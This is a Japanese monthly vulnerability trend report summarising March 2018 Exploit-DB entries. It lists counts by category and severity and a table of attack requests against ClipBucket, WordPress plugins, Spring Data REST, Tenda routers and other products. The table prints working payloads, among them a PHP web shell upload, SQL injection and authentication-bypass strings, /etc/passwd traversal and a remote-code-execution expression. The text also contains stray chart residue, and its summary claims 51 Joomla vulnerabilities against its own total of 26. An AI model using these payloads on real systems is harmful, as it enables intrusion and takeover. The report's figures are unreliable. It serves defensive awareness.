1. 脆弱性別件数
脆弱性カテゴリ 件数
サービス拒否攻撃(Denial of Service) 1
クッキーセッション(Cookie Session) 1
ローカルファイルインクルード(Local File Inclusion) 1
ファイルアップロード(File Upload) 2
コマンド インジェクション(Command Injection) 2
リモートDNS変更(Remote DNS Change) 3
ディレクトリトラバーサル(Directory Traversal) 4
クロスサイトスクリプティング(Cross Site Scripting:XSS) 5
SQL インジェクション(SQL Injection) 7 合計 26 2. 危険度別件数 危険度 件数 割合 早急対応要 10 38.46% 高 9 34.62% 中 7 26.92% 合計 26 100.00% 3. 攻撃実行の難易度別件数 難易度 件数 割合 難 2 7.69% 中 3 11.54% 易 21 80.77% 合計 26 100.00% 4. 主なソフトウェア別脆弱性発生件数 ソフトウェア名 件数 ClipBucket 4 antMan 2 TwonkyMedia Server 2 uWSGI 1 osCommerce 1
MyBB Plugin Last User's Threads in Profile Plugin 1
Bacula-Web 1
Tenda W3002R/A302/w309r Wireless Router 1
TextPattern 1
XenForo 1
Wordpress Plugin Site Editor 1
Redaxo CMS Addon MyEvents 1
WordPress Plugin Relevanssi 1
Advantech WebAccess 1
Tenda W308R v2 Wireless Router 1
SecurEnvoy SecurMail 1
Tenda W316R Wireless Router 1
Tuleap 1
Tenda FH303/A300 Firmware 1
WordPress Plugin Duplicator 1
Spring Data REST 1
合計 26
サマリー
2018年3月に公開されたExploit‐DBの脆弱性報告件数は、26件でした。この中で最も多くの脆弱性が公開された攻撃は、SQL Injection(SQLインジェクション)です。特に、Joomla Componentで51つの脆弱性が公開されました。この中で、注目すべきことは ""ClipBucket < 4.0.0 - Release 4902""脆弱性です。当脆弱性は、それぞれCommand Injection, File Upload, SQL Injection脆弱性を利用して攻撃が行なわれました。このように様々な脆弱性を利用した攻撃に対しては注意する必要があります。当脆弱性を 予防するためには、最新パッチとセキュアコーディングをおすすめします。しかし、完璧なセキュアコーディングは不可能であり、持続的にセキュリティを維持するためにはウェブアプリケーションファイアウォールを活用した深層防御(Defense indepth)実装を考慮しなければなり ません。 ペンタセキュリティシステムズ株式会社R&Dセンター データセキュリティチーム 1 1 1 2 2 3 4 5 0 1 2 3 4 5 6
Denial of Service Cookie Session Weakness
Remote DNS Change LFI File Upload Command Injection Remote DNS Change Directory Traversal XSS
취약점 별 보고 개수 10 9 7 危険度別件数 早急対応要 高 中 2 3 21 攻撃実行の難易度別件数 難 中 易 4 2 2 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 主なソフトウェア別脆弱性発生件数 ClipBucket antMan TwonkyMedia Server uWSGI osCommerce
MyBB Plugin Last User's Threads in Profile Plugin Bacula-Web
Tenda W3002R/A302/w309r Wireless Router TextPattern
XenForo Wordpress Plugin Site Editor Redaxo CMS Addon MyEvents WordPress Plugin Relevanssi Advantech WebAccess Tenda W308R v2 Wireless Router SecurEnvoy SecurMail Tenda W316R Wireless Router Tuleap Tenda FH303/A300 Firmware WordPress Plugin Duplicator
1 1 1 2 2 3 4 5 7 0 1 2 3 4 5 6 7 8 脆弱性別件数
日付き EDB番号 脆弱性カテゴリ 攻撃難 危険度 脆弱性名 攻撃コード 対象プログラム 対象環境
2018-03-02 44220 SQL Injection 易 高 antMan < 0.9.1a - AuthenticationBypass
POST / HTTP/1.1 Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Length: 25
username= > &password=%0a
antMan antMan < 0.9.1a
2018-03-02 44223 Directory Traversal 易 中
uWSGI < 2.0.17 - Directory
Traversal /..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd uWSGI uWSGI < 2.0.17
2018-03-05 44250 Command Injection 易 早急対応要
ClipBucket < 4.0.0 - Release 4902 - Command Injection / File
Upload / SQL Injection POST / HTTP/1.1 Host: 10.0.100.24:1004 User-Agent: curl/7.49.0 Accept: */* Content-Length: 441 Expect: 100-continue
Content-Type: multipart/form-data; boundary=---302967f62393cccd
---302967f62393cccd
Content-Disposition: form-data; name="file"; filename="pfile.php" Content-Type: application/octet-stream <?php echo passthru($_GET['cmd']); ?> ---302967f62393cccd--ClipBucket ClipBucket < 4.0.0 - Release 4902 2018-03-05 44250 File Upload 中 早急対応要 ClipBucket < 4.0.0 - Release 4902 - Command Injection / File
Upload / SQL Injection POST / HTTP/1.1 Host: 10.0.100.24:1004 User-Agent: curl/7.49.0 Accept: */* Content-Length: 441 Expect: 100-continue
Content-Type: multipart/form-data; boundary=---302967f62393cccd
---302967f62393cccd Content-Disposition: form-data; name="name" anyname.php
---302967f62393cccd
ClipBucket < 4.0.0 - Release4902
2018-03-05 44250 SQL Injection 易 早急対応要
ClipBucket < 4.0.0 - Release 4902 - Command Injection / File
Upload / SQL Injection POST /actions/vote_channel.php HTTP/1.1 Host: 10.0.100.24:1004 User-Agent: curl/7.49.0 Accept: */* Content-Length: 441 Expect: 100-continue
Content-Type: multipart/form-data; boundary=---302967f62393cccd channelId=channelId=1-BENCHMARK(100000000, rand()) mode=emailExists&email=1' or '1'='1 mode=userExists&username=1' or '1'='1 ClipBucket ClipBucket < 4.0.0 - Release 4902
2018-03-07 44261 SQL Injection 易 早急対応要 Redaxo CMS Addon MyEvents2.2.1 - SQL Injection /redaxo/index.php?page=myevents/event_add&myevents_id=1' or '1'='1 Addon MyEventsRedaxo CMS
Redaxo CMS Addon MyEvents
2.2.1
2018-03-07 44262 SQL Injection 易 高 antMan 0.9.0c - AuthenticationBypass
POST /login HTTP/1.1 Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Length: 25 username= > &password=%0a antMan antMan 0.9.0c 2018-03-09 44272 SQL Injection 難 早急対応要 Bacula-Web < 8.0.0-rc2 - SQL Injection /jobs.php?status=0&level_id=&client_id=0&start_time=&end_time=&ord erby=jobid&jobs_per_page=25&pool_id=11%27%20UNION%20ALL%20SE LECT%20@@version%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2 CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNU LL%23 HTTP/1.1 Bacula-Web Bacula-Web < 8.0.0-rc2
2018-03-12 44277 SQL Injection 易 早急対応要 TextPattern 4.6.2 - 'qty' SQLInjection /textpattern/textpattern/index.php?event=link&step=link_change_pageby&qty=50&_txp_token=baa07ba857d3618ef810b725b9d4d9d8 TextPattern TextPattern 4.6.2
2018-03-12 44278 Directory Traversal 易 中
Advantech WebAccess < 8.3 -Directory Traversal / Remote
Code Execution
..\\..\\windows\\system32\\calc.exe WebAccessAdvantech WebAccess < 8.3Advantech
2018-03-13 44285 XSS 易 高 SecurEnvoy SecurMail 9.1.501 -Multiple Vulnerabilities
POST /secupload2/upload.aspx HTTP/1.1 Content-Disposition: form-data; name="MessageID" Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7
Accept: */*
Content-Type: multipart/form-data; boundary=---8221195488 Content-Length: 309 name=""><script>alert('xss')</script>" SecurEnvoy SecurMail SecurEnvoy SecurMail 9.1.501 2018.03.01~2018.03.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。
EDB-Report
最新Web脆弱性トレンドレポート(2018.03)日付き EDB番号 脆弱性カテゴリ 攻撃難 危険度 脆弱性名 攻撃コード 対象プログラム 対象環境
2018-03-13 44286 SQL Injection 難 早急対応要 Tuleap 9.17.99.189 - Blind SQL
Injection
POST /plugins/tracker/?tracker=16 HTTP/1.1 Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Content-Length: 284 report=124&criteria%5B504%5D=&criteria%5B489%5D=&criteria%5B495 %5D%5Bvalues%5D= &criteria%5B495%5D%5Bvalues%5D%5B%5D=&criteria%5B499%5D%5Bv alues%5D= &criteria%5B499%5D%5Bvalues%5D%5B%5D=(select(0)from(select(sleep( 3)))a)/**/ &additional_criteria%5Bcomment%5D=&tracker_query_submit= Tuleap Tuleap 9.17.99.189
2018-03-15 44288 XSS 易 高 WordPress Plugin Duplicator
1.2.32 - Cross-Site Scripting
POST /wp-content/plugins/duplicator/installer/build/view.step4.php HTTP/1.1
Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Length: 91 json='a';};document.write(alert(document.cookie));MyViewModel%3dfunct ion(){this.status%3d'' WordPress Plugin Duplicator WordPress Plugin Duplicator 1.2.32 2018-03-15 44289 Command Injection 中 早急対応要
Spring Data REST < 2.6.9 (Ingalls SR9) / 3.0.1 (Kay SR1) - PATCH Request Remote Code Execution
POST / HTTP/1.1 Host : User-Agent: Mozilla/5.0 Accept : */* Content-Type : application/json-patch+json T(org.springframework.util.StreamUtils).copy(T(java.lang.Runtime).getRunti me().exec((T(java.lang.System).getProperty(\\\"os.name\\\").toLowerCase ().contains(\\\"win\\\")?\\\"cmd \\\"+" + SLASH + "+\\\"c \\\"":\\\"\\\")+%s).getInputStream(),T(org.springframework.web.context. request.RequestContextHolder).currentRequestAttributes().getResponse(). getOutputStream()).x
Spring Data REST
Spring Data REST < 2.6.9 (Ingalls SR9) / 3.0.1 (Kay
SR1)
2018-03-23 44336 Denial of Service 易 高 XenForo 2 - CSS Loader Denial ofService
POST / HTTP/1.1 Host : User-Agent : random.choice(headers_useragents) Accept : */* Content-Type : application/json\ XenForo XenForo 2 2018-03-23 44339 XSS 易 高
MyBB Plugin Last User's Threads in Profile Plugin 1.2 - Persistent
Cross-Site Scripting
<p """><SCRIPT>alert("XSS")</SCRIPT>">
MyBB Plugin Last User's Threads in Profile Plugin
MyBB Plugin Last User's Threads in Profile Plugin 1.2
2018-03-23 44340 LFI 易 高 Wordpress Plugin Site Editor 1.1.1
- Local File Inclusion
POST
/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.ph p? HTTP/1.1
Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Length: 21
ajax_path=/etc/passwd
Wordpress Plugin Site Editor
Wordpress Plugin Site Editor
1.1.1
2018-03-27 44346 File Upload 易 早急対応要
ClipBucket - beats_uploader Unauthenticated Arbitrary File
Upload (Metasploit)
POST / HTTP/1.1 Host: Connection: Close
Accept: text/html, application/xhtml+xml, */* Accept-Language: ko-KR
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)
Content-Type: multipart/form-data; boundary=#{post_data.bound} Content-Length: 218
---7dd10029908f2
Content-Disposition: form-data; name="file"; filename="filename.php" Content-Type: application/octet-stream
<? phpinfo(); ?>
---7dd10029908f2--ClipBucket ClipBucket
2018-03-28 44350 Directory Traversal 易 中 TwonkyMedia Server 7.0.11-8.5 -Directory Traversal
POST /rpc/set_all HTTP/1.1 Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:57.0) Gecko/20100101 Firefox/57.0 Accept: */* Content-Type: application/x-www-form-urlencoded Content-Length: 15 contentdir=/../ TwonkyMedia Server TwonkyMedia Server 7.0.11-8.5
2018-03-28 44351 XSS 易 高 TwonkyMedia Server 7.0.11-8.5 -Persistent Cross-Site Scripting
POST /rpc/set_all HTTP/1.1 Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:57.0) Gecko/20100101 Firefox/57.0 Accept: */* Content-Type: application/x-www-form-urlencoded Content-Length: 39 friendlyname=<script>alert(1)</script> TwonkyMedia Server TwonkyMedia Server 7.0.11-8.5
日付き EDB番号 脆弱性カテゴリ 攻撃難 危険度 脆弱性名 攻撃コード 対象プログラム 対象環境 2018.03.01~2018.03.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。
EDB-Report
最新Web脆弱性トレンドレポート(2018.03)
2018-03-30 44366 XSS 易 高 WordPress Plugin Relevanssi 4.0.4
- Reflected Cross-Site Scripting
/wp-admin/options-general.php?page=relevanssi%2Frelevanssi.php&tab='><SCRIPT>var+x+ %3D+String(%2FXSS%2F)%3Bx+%3D+x.substring(1%2C+x.length-1)%3Balert(x)<%2FSCRIPT><BR+ WordPress Plugin Relevanssi WordPress Plugin Relevanssi 4.0.4 2018-03-30 44373 Cookie Session Weakness Remote DNS Change 易 中
Tenda W308R v2 Wireless Router 5.07.48 - Cookie Session Weakness Remote DNS Change
/goform/AdvSetDns?GO=wan_dns.asp&rebootTag=&DSEN=1&DNSEN= on&DS1=8.8.8.8&DS2=10.0.100.24" 2>/dev/null Tenda W308R v2 Wireless Router Tenda W308R v2 Wireless Router 5.07.48
2018-03-30 44374 Directory Traversal 中 早急対応要 osCommerce 2.3.4.1 - RemoteCode Execution
POST /oscommerce-2.3.4.1/catalog/install/install.php HTTP/1.1 Host :
User-Agent : Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7
Accept : */*
Content-Type : application/x-www-form-urlencoded; charset=UTF-8
\'); system("ls"); /*
osCommerce osCommerce2.3.4.1
2018-03-30 44377 Remote DNS Change 易 中 Tenda W316R Wireless Router5.07.50 - Remote DNS Change goform/AdvSetDns?GO=wan_dns.asp&rebootTag=&DSEN=1&DNSEN=on&DS1=8.8.8.8&DS2=10.0.0.100" 2>/dev/null Wireless RouterTenda W316R
Tenda W316R Wireless Router 5.07.50
2018-03-30 44380 Remote DNS Change 易 中
Tenda W3002R/A302/w309r Wireless Router v5.07.64_en -Remote DNS Change (PoC)
goform/AdvSetDns?GO=wan_dns.asp&rebootTag=&DSEN=1&DNSEN=o n&DS1=8.8.8.8&DS2=10.0.0.100" 2>/dev/null Tenda W3002R/A302/w 309r Wireless Router Tenda W3002R/A302/w 309r Wireless Router v5.07.64_en 2018-03-30 44381 Remote DNS Change 易 中
Tenda FH303/A300 Firmware v5.07.68_EN - Remote DNS Change goform/AdvSetDns?GO=wan_dns.asp&rebootTag=&DSEN=1&DNSEN=o n&DS1=8.8.8.8&DS2=10.0.0.100" 2>/dev/null Tenda FH303/A300 Firmware Tenda FH303/A300 Firmware v5.07.68_EN
